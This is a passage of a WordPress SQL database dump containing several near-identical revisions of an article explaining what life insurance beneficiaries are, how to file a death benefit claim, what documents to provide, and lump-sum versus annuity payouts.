<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.</div>','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 13:57:03','2023-03-13 13:57:03','',256,'http://cmdev-site1.com/?p=259',0,'revision','',0),(263,3,'2023-03-13 13:59:07','2023-03-13 13:59:07','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote>\r\n<p class=\"article-break-quote\"><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></p>\r\n</blockquote>\r\n<h2><strong>How do beneficiaries file a life insurance claim?</strong></h2>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company for the life insurance policy that was purchased.\r\n\r\nGenerally speaking, life insurance companies require those filing a claim to provide the following:\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud.\r\n\r\nTo receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document.\r\n\r\nIf you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<div class=\"third-part\">\r\n<h2><strong>You gathered your documents; now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.</div>\r\n<div></div>\r\n<div class=\"third-part\">In other words, the insurance company will review the information provided and make a determination on the claim.</div>\r\n<div></div>\r\n<div class=\"third-part\">Keep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n</div>\r\n<div class=\"third-part\">\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.</div>','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 13:59:07','2023-03-13 13:59:07','',256,'http://cmdev-site1.com/?p=263',0,'revision','',0),(261,3,'2023-03-13 13:58:18','2023-03-13 13:58:18','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote>\r\n<p class=\"article-break-quote\"><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></p>\r\n</blockquote>\r\n<h2><strong>How do beneficiaries file a life insurance claim?</strong></h2>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company for the life insurance policy that was purchased.\r\n\r\nGenerally speaking, life insurance companies require those filing a claim to provide the following:\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud.\r\n\r\nTo receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document.\r\n\r\nIf you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<div class=\"third-part\">\r\n<h2><strong>You gathered your documents; now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.</div>\r\n<div></div>\r\n<div class=\"third-part\">In other words, the insurance company will review the information provided and make a determination on the claim.</div>\r\n<div></div>\r\n<div class=\"third-part\">Keep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n</div>\r\n<div class=\"third-part\">\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.</div>','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 13:58:18','2023-03-13 13:58:18','',256,'http://cmdev-site1.com/?p=261',0,'revision','',0),(262,3,'2023-03-13 13:58:41','2023-03-13 13:58:41','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote>\r\n<p class=\"article-break-quote\" style=\"padding-left: 40px;\"><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></p>\r\n</blockquote>\r\n<h2><strong>How do beneficiaries file a life insurance claim?</strong></h2>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company for the life insurance policy that was purchased.\r\n\r\nGenerally speaking, life insurance companies require those filing a claim to provide the following:\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud.\r\n\r\nTo receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document.\r\n\r\nIf you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<div class=\"third-part\">\r\n<h2><strong>You gathered your documents; now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.</div>\r\n<div></div>\r\n<div class=\"third-part\">In other words, the insurance company will review the information provided and make a determination on the claim.</div>\r\n<div></div>\r\n<div class=\"third-part\">Keep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n</div>\r\n<div class=\"third-part\">\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.</div>','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 13:58:41','2023-03-13 13:58:41','',256,'http://cmdev-site1.com/?p=262',0,'revision','',0),(264,3,'2023-03-13 14:00:47','2023-03-13 14:00:47','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote>\r\n<p class=\"article-break-quote\"><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></p>\r\n</blockquote>\r\n<h2><strong>How do beneficiaries file a life insurance claim?</strong></h2>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company for the life insurance policy that was purchased.\r\n\r\nGenerally speaking, life insurance companies require those filing a claim to provide the following:\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud.\r\n\r\nTo receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document.\r\n\r\nIf you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<div class=\"third-part\">\r\n<h2><strong>You gathered your documents; now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.</div>\r\n<div></div>\r\n<div class=\"third-part\">In other words, the insurance company will review the information provided and make a determination on the claim.</div>\r\n<div></div>\r\n<div class=\"third-part\">Keep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n</div>\r\n<div class=\"third-part\">\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.</div>','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:00:47','2023-03-13 14:00:47','',256,'http://cmdev-site1.com/?p=264',0,'revision','',0),(266,3,'2023-03-13 14:05:22','2023-03-13 14:05:22','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away. Often, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy. Some life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong>How do beneficiaries file a life insurance claim?</strong></h2>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process. The best way to determine what documents are needed is to contact the customer service department for the insurance company the life insurance policy was purchased through. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death. However, you can also request a copy from the local vital records office. Keep in mind, it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary, and at the discretion of the insurance company.\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim. Keep in mind, some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information, or even to have a claim rejected.\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy, and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:05:22','2023-03-13 14:05:22','',256,'http://cmdev-site1.com/?p=266',0,'revision','',0),(267,3,'2023-03-13 14:08:13','2023-03-13 14:08:13','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong>How do beneficiaries file a life insurance claim?</strong></h2>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:08:13','2023-03-13 14:08:13','',256,'http://cmdev-site1.com/?p=267',0,'revision','',0),(268,3,'2023-03-13 14:13:07','2023-03-13 14:13:07','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<span style=\"color: #ffffff;\">z</span>\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\n<span 